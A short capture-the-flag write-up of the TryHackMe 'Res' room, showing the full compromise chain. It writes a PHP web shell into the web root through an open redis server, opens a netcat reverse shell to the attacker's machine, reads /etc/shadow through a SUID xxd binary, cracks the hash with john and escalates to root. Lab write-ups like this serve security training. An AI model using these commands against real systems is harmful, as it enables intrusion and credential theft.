Res

These notes are from a challenge I did @tryhackme called res.

Flag 1

Scanning the environment we find an apache webserver and a redis database...

sudo nmap -sC -sV -sS 10.10.103.145 -p-

When connecting to redis we can set write a file to the main apache dir and create a simple php reverse shell:

redis-cli -h 10.10.103.145
>config set dir /var/www/html
>config set dbfilename shell.php
>set test "<?php system($_GET['cmd']);?>"

Before we visit our new page we should open a netcat session:

nc -nvlp 666

Time to run our shell.php :)

http://10.10.103.145/shell.php?cmd=nc 10.10.146.116 667 -e /bin/sh

Once we are succesfully connected we can stabilize the shell and view the first flag:

python3 -c 'import pty;pty.spawn("/bin/bash")'
cat /home/vianka/user.txt

Flag 2

Lets have a look at the passwd

cat /etc/passwd
vianka:x:1000:1000:Res,,,:/home/vianka:/bin/bash

There is SUID bit set for xxd. To access the shadow file can use this trick.

LFILE=/etc/shadow
xxd "$LFILE" | xxd -r
vianka:$6$2p.tSTds$qWQfsXwXOAxGJUBuq2RFXqlKiql3jxlwEWZP6CWXm7kIbzR6WzlxHR.UHmi.hc1/TuUOUBo/jWQaQtGSXwvri0:18507:0:99999:7:::

Time to crack the password:

unshadow passwd.txt shadow.txt > hash.txt
john hash.txt

Once we have the password we can escalate our priviledges to vianka which somehow also has root access.

su vianka
sudo su
cat /root/root.txt